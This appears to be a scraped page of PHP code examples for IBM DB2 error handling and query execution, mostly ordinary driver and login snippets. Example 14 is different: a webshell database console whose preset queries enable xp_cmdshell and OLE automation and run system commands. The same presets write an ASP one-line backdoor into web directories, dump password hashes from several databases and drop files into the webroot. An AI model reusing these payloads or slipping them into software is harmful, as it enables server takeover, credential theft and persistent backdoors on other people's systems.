 public static function errorMessage($conn)
 {
     $lastStatementError = db2_stmt_errormsg();

     return $lastStatementError;
 }
Esempio n. 13
 /**
  * error()
  *
  * Returns the last DB2 statement error string, as reported by db2_stmt_errormsg() called
  * without a statement argument. The text can name tables and columns; keep it in logs
  * rather than in pages served to visitors.
  *
  * @access  public
  * @author  Thorsten Rinne <*****@*****.**>
  * @since   2005-04-16
  * @return  string
  */
 function error()
 {
     $lastStatementError = db2_stmt_errormsg();

     return $lastStatementError;
 }
Esempio n. 14
function otherdb()
{
    $db = isset($_GET['db']) ? $_GET['db'] : '';
    print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
<div class="actall"><a href="?s=w"> &nbsp psotgresql &nbsp</a> 
<a href="?s=w&db=ms"> &nbsp mssql &nbsp</a> 
<a href="?s=w&db=ora"> &nbsp oracle &nbsp</a>
<a href="?s=w&db=ifx"> &nbsp informix &nbsp</a>
<a href="?s=w&db=fb"> &nbsp  firebird &nbsp</a>
<a href="?s=w&db=db2">&nbsp db2 &nbsp</a></div></form>
END;
    if ($db == "ms") {
        $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
        $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
        $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '******';
        $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
        $msaction = isset($_POST['action']) ? $_POST['action'] : '';
        $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
        $msquery = stripslashes($msquery);
        print <<<END
<form method="POST" name="msform" action="?s=w&db=ms">
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
        Str[0] = "";
\tStr[1] = "select @@version;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select name from sysobject where type='U';";
        Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
        Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
        Str[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
        msform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">add sp_oacreate</option>
\t<option value="6">add xp_cmdshell</option>
\t<option value="7">add xp_cmdshell(2005)</option>
        <option value="8">add sp_oacreate(2005)</option>
        <option value="9">open openrowset(2005)</option>
        <option value="10">xp_cmdshell exec</option>
        <option value="10">sp_oamethod exec</option>
        <option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($msaction == 'msquery') {
            $msconn = mssql_connect($mshost, $msuser, $mspass);
            mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
            $msresult = mssql_query($msquery) or die(mssql_get_last_message());
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            mssql_data_seek($result, 0);
            while ($msrow = mssql_fetch_row($msresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$msrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            mssql_free_result($msresult);
            mssql_close();
        }
    } elseif ($db == "ora") {
        $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
        $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
        $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
        $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
        $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
        $oraaction = isset($_POST['action']) ? $_POST['action'] : '';
        $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
        $oraquery = stripslashes($oraquery);
        print <<<END
<form method="POST" name="oraform" action="?s=w&db=ora">
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
<script language="javascript">
function oraFull(i){
\tStr = new Array(8);
        Str[0] = ""; 
\tStr[1] = "select version();";
        Str[2] = "show databases;";
        Str[3] = "show tables from db_name;";
        Str[4] = "show columns from table_name;";
        Str[5] = "select user,password from mysql.user;";
\tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
\tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
\t<option value="6">load_file</option>
\t<option value="7">into outfile</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($oraaction == 'oraquery') {
            $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
            $oraresult = ociparse($oralink, $oraquery) or die(ocierror());
            $orarow = oci_fetch_row($oraresult);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            ociresult($oraresult, 0);
            while ($orarow = ora_fetch_row($oraresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ora_num_fields($result); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$orarow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            oci_free_statement($oraresult);
            ocilogoff();
        }
    } elseif ($db == "ifx") {
        $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
        $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
        $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
        $ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
        $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
        $ifxquery = stripslashes($ifxquery);
        print <<<END
<form method="POST" name="ifxform" action="?s=w&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
<script language="javascript">
function ifxFull(i){
\tStr = new Array(11);
        Str[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select tabname from systables;";
        Str[4] = "select colname from syscolumns where tabid=n;";
        Str[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">dbservername</option>
        <option value="1">databases</option>
        <option value="2">tables</option>
        <option value="3">columns</option>
        <option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($ifxaction == 'ifxquery') {
            $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
            $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
            $ifxrow = ifx_fetch_row($ifxresult);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            mysql_data_seek($ifxresult, 0);
            while ($ifxrow = ifx_fetch_row($ifxresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$ifxrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            ifx_free_result($ifxresult);
            ifx_close();
        }
    } elseif ($db == "db2") {
        $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
        $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
        $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
        $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
        $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
        $db2action = isset($_POST['action']) ? $_POST['action'] : '';
        $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
        $db2query = stripslashes($db2query);
        print <<<END
<form method="POST" name="db2form" action="?s=w&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
<script language="javascript">
function db2Full(i){
\tStr = new Array(4);
        Str[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
        Str[2] = "select name from sysibm.systables;";
        Str[3] = "select colname from syscat.columns where tabname='table_name';";
        Str[4] = "db2 get db cfg for db_name;";
\tdb2form.db2sql.value = Str[i];
\treturn true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">databases</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">db config</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($myaction == 'db2query') {
            //$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
            $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
            $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
            $db2row = db2_fetch_row($db2result);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            while ($db2row = db2_fetch_row($db2result)) {
                echo "<tr>\n";
                for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$db2row[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            db2_free_result($db2result);
            db2_close();
        }
    } elseif ($db == "fb") {
        $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
        $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
        $fbpath = str_replace("\\\\", "\\", $fbpath);
        $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
        $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
        $fbaction = isset($_POST['action']) ? $_POST['action'] : '';
        $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
        $fbquery = stripslashes($fbquery);
        print <<<END
<form method="POST" name="fbform" action="?s=w&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
\tStr = new Array(5);
        Str[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
        Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
        Str[3] = "input 'D:\\createtable.sql';";
        Str[4] = "shell netstat -an;";
\tfbform.fbsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">import sql</option>
        <option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($fbaction == 'fbquery') {
            $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
            $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            ibase_field_info($fbresult, 0);
            while ($fbrow = ibase_fetch_row($fbresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$fbrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            ibase_free_result($fbresult);
            ibase_close();
        }
    } else {
        $pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
        $pguser = isset($_POST['pguser']) ? $_POST['pguser'] : '******';
        $pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
        $pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
        $pgaction = isset($_POST['action']) ? $_POST['action'] : '';
        $pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : '';
        $pgquery = stripslashes($pgquery);
        print <<<END
<form method="POST" name="pgform" action="?s=w">
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
<script language="javascript">
function pgFull(i){
\tStr = new Array(7);
\tStr[0] = "";
        Str[1] = "select version();";
        Str[2] = "select datname from pg_database;";
        Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
        Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
        Str[5] = "select usename,passwd from pg_shadow;";
\tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
\tpgform.pgsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<select onchange="return pgFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
\t<option value="6">pg_hb.conf</option>
</select>
<input type="hidden" name="action" value="pgquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($pgaction == 'pgquery') {
            $pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error());
            $pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error());
            $pgrow = pg_fetch_row($pgresult);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            pg_result_seek($pgresult, 0);
            while ($pgrow = pg_fetch_row($pgresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$pgrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            pg_free_result($pgresult);
            pg_close();
        }
    }
}
Esempio n. 15
 /**
  * Report the most recent DB2 statement error unless its SQLSTATE is on the ignore list.
  *
  * @param resource|false $stmt Statement to inspect. When falsy, the driver's error
  *                             functions are called without a statement argument.
  * @return bool True when an error was handed to print_error(), false otherwise.
  */
 private function check_and_print_stmt_error($stmt = false)
 {
     // SQLSTATE 02000 is "no data"; it is not treated as an error here.
     $ignoredStates = array('02000');
     $message = $stmt ? db2_stmt_errormsg($stmt) : db2_stmt_errormsg();
     if (!$message) {
         return false;
     }
     $state = $stmt ? db2_stmt_error($stmt) : db2_stmt_error();
     if (in_array($state, $ignoredStates)) {
         return false;
     }
     $this->print_error($message, $state);
     return true;
 }
Esempio n. 16
<?php

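// Login handler: checks the posted e-mail/password pair against OWNER.USERS and,
// on success, stores the user name in the session and redirects to nav.php.
error_reporting(0);
// A session has to be active before it can be cleared; session_unset() does
// nothing while no session is started.
session_start();
session_unset();
// connect.php presumably defines $database, $dbusername and $dbpassword (not visible here).
include 'connect.php';
// Both fields must be plain strings; array-valued POST fields are rejected with 400.
if (isset($_POST['userName'], $_POST['password']) && is_string($_POST['userName']) && is_string($_POST['password'])) {
    $usernameEntered = $_POST['userName'];
    $passwordEntered = $_POST['password'];
    $conn = db2_connect($database, $dbusername, $dbpassword);
    if (!$conn) {
        // Keep driver details in the server log, never in the response.
        error_log('login: DB2 connect failed: ' . db2_conn_errormsg());
        http_response_code(500);
        exit;
    }
    // The e-mail is bound through a parameter marker instead of being interpolated
    // into the SQL text, so it cannot alter the statement.
    $stmt = db2_prepare($conn, 'SELECT password FROM OWNER.USERS WHERE email = ?');
    if (!$stmt || !db2_execute($stmt, array($usernameEntered))) {
        error_log('login: DB2 query failed: ' . ($stmt ? db2_stmt_errormsg($stmt) : db2_stmt_errormsg()));
        db2_close($conn);
        http_response_code(500);
        exit;
    }
    // Stays null when no row matches, which is treated as a failed login below.
    $passwordFromDb = null;
    while ($row = db2_fetch_array($stmt)) {
        $passwordFromDb = $row[0];
    }
    db2_close($conn);
    // The stored value is never echoed: it would leak the credential and send
    // output before the Location header.
    // NOTE(review): the column is compared directly with the submitted password, so it
    // appears to hold plaintext. Store password_hash() output and check it with
    // password_verify() instead; hash_equals() only makes the comparison strict and
    // constant-time.
    if (is_string($passwordFromDb) && hash_equals($passwordFromDb, $passwordEntered)) {
        // New session id on privilege change, so a pre-login id cannot be reused.
        session_regenerate_id(true);
        $_SESSION['username'] = $usernameEntered;
        header('Location: nav.php');
        exit;
    }
    header('Location: login.php');
    exit;
} else {
    http_response_code(400);
}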
Esempio n. 17
 /**
  * Execute the statement.
  *
  * Prepares the statement first when that has not happened yet, merges the given
  * parameters into the statement's ParameterContainer and passes them to
  * db2_execute() as a positional array.
  *
  * @param array|ParameterContainer|null $parameters
  * @return Result
  * @throws Exception\RuntimeException when db2_execute() returns false
  */
 public function execute($parameters = null)
 {
     if (!$this->isPrepared) {
         $this->prepare();
     }
     /** START Standard ParameterContainer Merging Block */
     $hasContainer = $this->parameterContainer instanceof ParameterContainer;
     if (!$hasContainer && $parameters instanceof ParameterContainer) {
         $this->parameterContainer = $parameters;
         $parameters = null;
     } elseif (!$hasContainer) {
         $this->parameterContainer = new ParameterContainer();
     }
     if (is_array($parameters)) {
         $this->parameterContainer->setFromArray($parameters);
     }
     /** END Standard ParameterContainer Merging Block */
     if ($this->profiler) {
         $this->profiler->profilerStart($this);
     }
     // Swallow E_WARNING for the duration of the driver call; failure is detected
     // from the return value below.
     set_error_handler(function () {
     }, E_WARNING);
     $boundValues = $this->parameterContainer->getPositionalArray();
     $response = db2_execute($this->resource, $boundValues);
     restore_error_handler();
     if ($this->profiler) {
         $this->profiler->profilerFinish();
     }
     if (false === $response) {
         throw new Exception\RuntimeException(db2_stmt_errormsg($this->resource));
     }
     return $this->driver->createResult($this->resource);
 }
Esempio n. 18
 /**
  * Describe the most recent DB2 failure, if there is one.
  *
  * A connection error takes precedence. The statement error is only consulted
  * when $this->ignoreErrors is not set.
  *
  * @see DBManager::lastDbError()
  * @return string|false Error text, or false when nothing is reported.
  */
 public function lastDbError()
 {
     $connState = db2_conn_error();
     if ($connState) {
         return "IBM_DB2 connection error " . $connState . ": " . db2_conn_errormsg();
     }
     /* FIXME:
      * The statement error check can be skipped (via ignoreErrors) because of a
      * statics bug in the DB2 driver which persists failures
      * http://pecl.php.net/bugs/bug.php?id=22854
      */
     if ($this->ignoreErrors) {
         return false;
     }
     $stmtState = db2_stmt_error();
     if (!$stmtState) {
         return false;
     }
     return "IBM_DB2 statement error " . $stmtState . ": " . db2_stmt_errormsg();
 }
Esempio n. 19
 /**
  * Format the error left by the previous database operation.
  *
  * DB2 keeps statement errors and connection errors apart, so both are checked,
  * the statement error first.
  *
  * @return string|null "<code>: <message>", or null when neither error is set
  */
 function lastError()
 {
     $stmtState = db2_stmt_error();
     if ($stmtState) {
         return $stmtState . ': ' . db2_stmt_errormsg();
     }
     $connState = db2_conn_error();
     if ($connState) {
         return $connState . ': ' . db2_conn_errormsg();
     }
     return null;
 }
Esempio n. 20
 /**
  * Execute an SQL string directly on the connection.
  *
  * The string is handed to db2_exec() as is; nothing is bound or escaped here.
  *
  * @param  string $sql
  * @return Result
  * @throws Exception\InvalidQueryException when db2_exec() returns false
  */
 public function execute($sql)
 {
     if (!$this->isConnected()) {
         $this->connect();
     }
     if ($this->profiler) {
         $this->profiler->profilerStart($sql);
     }
     // Swallow E_WARNING for the duration of the driver call; failure is detected
     // from the return value below.
     set_error_handler(function () {
     }, E_WARNING);
     $resultResource = db2_exec($this->resource, $sql);
     restore_error_handler();
     if ($this->profiler) {
         $this->profiler->profilerFinish($sql);
     }
     if (false === $resultResource) {
         throw new Exception\InvalidQueryException(db2_stmt_errormsg());
     }
     // A literal true is not a result resource, so the connection resource is wrapped instead.
     $wrapped = true === $resultResource ? $this->resource : $resultResource;
     return $this->driver->createResult($wrapped);
 }
Esempio n. 21
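/**
 * Run an SQL statement on the backend selected by $DB['TYPE'] and report success.
 *
 * The query text is sent to the driver exactly as given; no values are bound or
 * escaped here, so callers have to build $query from trusted or escaped parts.
 * On failure the query text and the driver message are passed to error().
 *
 * @param string $query               SQL text to execute
 * @param int    $skip_error_messages not read anywhere in this function
 *
 * @return bool true on success, false on failure or when no connection is configured
 */
function DBexecute($query, $skip_error_messages = 0)
{
    global $DB;
    if (!isset($DB['DB']) || empty($DB['DB'])) {
        return false;
    }
    $result = false;
    $time_start = microtime(true);
    $DB['EXECUTE_COUNT']++;
    switch ($DB['TYPE']) {
        case ZBX_DB_MYSQL:
            if (!($result = mysqli_query($DB['DB'], $query))) {
                error('Error in query [' . $query . '] [' . mysqli_error($DB['DB']) . ']');
            }
            break;
        case ZBX_DB_POSTGRESQL:
            if (!($result = (bool) pg_query($DB['DB'], $query))) {
                error('Error in query [' . $query . '] [' . pg_last_error() . ']');
            }
            break;
        case ZBX_DB_ORACLE:
            if (!($result = oci_parse($DB['DB'], $query))) {
                // Parse errors are reported against the connection handle.
                $e = @oci_error($DB['DB']);
                error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
            } elseif (!@oci_execute($result, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS)) {
                $e = oci_error($result);
                error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
            } else {
                $result = true;
                // function must return boolean
            }
            break;
        case ZBX_DB_DB2:
            if (!($result = db2_prepare($DB['DB'], $query))) {
                // No statement resource exists after a failed prepare, so ask the
                // driver for its last statement error instead of passing false.
                $e = @db2_stmt_errormsg();
                error('SQL error [' . $query . '] in [' . $e . ']');
            } elseif (true !== @db2_execute($result)) {
                $e = @db2_stmt_errormsg($result);
                error('SQL error [' . $query . '] in [' . $e . ']');
            } else {
                $result = true;
                // function must return boolean
            }
            break;
        case ZBX_DB_SQLITE3:
            if ($DB['TRANSACTIONS'] == 0) {
                lock_sqlite3_access();
            }
            if (!($result = $DB['DB']->exec($query))) {
                error('Error in query [' . $query . '] Error code [' . $DB['DB']->lastErrorCode() . '] Message [' . $DB['DB']->lastErrorMsg() . ']');
            }
            if ($DB['TRANSACTIONS'] == 0) {
                unlock_sqlite3_access();
            }
            break;
    }
    // A failed statement inside a transaction marks the whole transaction as failed.
    if ($DB['TRANSACTIONS'] != 0 && !$result) {
        $DB['TRANSACTION_NO_FAILED_SQLS'] = false;
    }
    CProfiler::getInstance()->profileSql(microtime(true) - $time_start, $query);
    return (bool) $result;
}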
Esempio n. 22
 /**
  * Run an SQL string on the adapter's connection and discard the result.
  *
  * The string goes to db2_exec() unchanged, and it is repeated in the exception
  * message on failure.
  *
  * @param string $sql
  * @return void
  * @throws Zend_Db_Exception when db2_exec() returns a falsy value
  */
 protected function _rawQuery($sql)
 {
     $outcome = @db2_exec($this->_db->getConnection(), $sql);
     if ($outcome) {
         return;
     }
     $e = db2_stmt_errormsg();
     require_once 'Zend/Db/Exception.php';
     throw new Zend_Db_Exception("SQL error for \"{$sql}\": {$e}");
 }
Esempio n. 23
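 /**
  * This function processes an SQL statement that will NOT return data.
  *
  * The statement is passed to db2_exec() unchanged; nothing is bound or escaped here.
  *
  * @access public
  * @override
  * @param string $sql                           the SQL statement
  * @throws Throwable_SQL_Exception              indicates that the executed
  *                                              statement failed
  *
  * @see http://www.php.net/manual/en/function.db2-exec.php
  * @see http://www.php.net/manual/en/function.db2-free-result.php
  */
 public function execute($sql)
 {
     if (!$this->is_connected()) {
         throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: Unable to find connection.');
     }
     $command = @db2_exec($this->resource, $sql);
     if ($command === FALSE) {
         // $command is FALSE here, not a statement resource, so the driver is asked for
         // its last statement error; passing FALSE would lose the reason.
         throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: :reason', array(':reason' => @db2_stmt_errormsg()));
     }
     $this->sql = $sql;
     @db2_free_result($command);
 }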
Esempio n. 24
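 /**
  * Run an SQL string on the DB2 connection after switching to the configured schema.
  *
  * @param string $sql SQL text, passed to db2_exec() unchanged
  * @return resource result of db2_exec()
  * @throws DBUnexpectedError when db2_exec() returns a falsy value
  */
 public function doQuery($sql)
 {
     //print "<li><pre>$sql</pre></li>";
     // Switch into the correct namespace
     $this->applySchema();
     $ret = db2_exec($this->mConn, $sql, $this->mStmtOptions);
     if (!$ret) {
         // The failed statement goes into an HTML page, so it is escaped like the
         // driver message below; raw SQL can carry markup from request values.
         // NOTE(review): echoing the statement also discloses query structure to
         // whoever sees the page; consider limiting this to a debug mode.
         print "<br><pre>";
         print htmlspecialchars($sql);
         print "</pre><br>";
         $error = db2_stmt_errormsg();
         throw new DBUnexpectedError($this, 'SQL error: ' . htmlspecialchars($error));
     }
     $this->mLastResult = $ret;
     $this->mAffectedRows = null;
     // Not calculated until asked for
     return $ret;
 }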
Esempio n. 25
 /**
  * {@inheritdoc}
  *
  * When no parameters are passed, the values collected in $this->_bindParam are
  * used, ordered by key.
  *
  * @throws DB2Exception when db2_execute() returns false
  */
 public function execute($params = null)
 {
     if (!$this->_stmt) {
         return false;
     }
     if (null === $params) {
         // Order the bound values by key so they line up with the parameter markers.
         ksort($this->_bindParam);
         $params = array_values($this->_bindParam);
     }
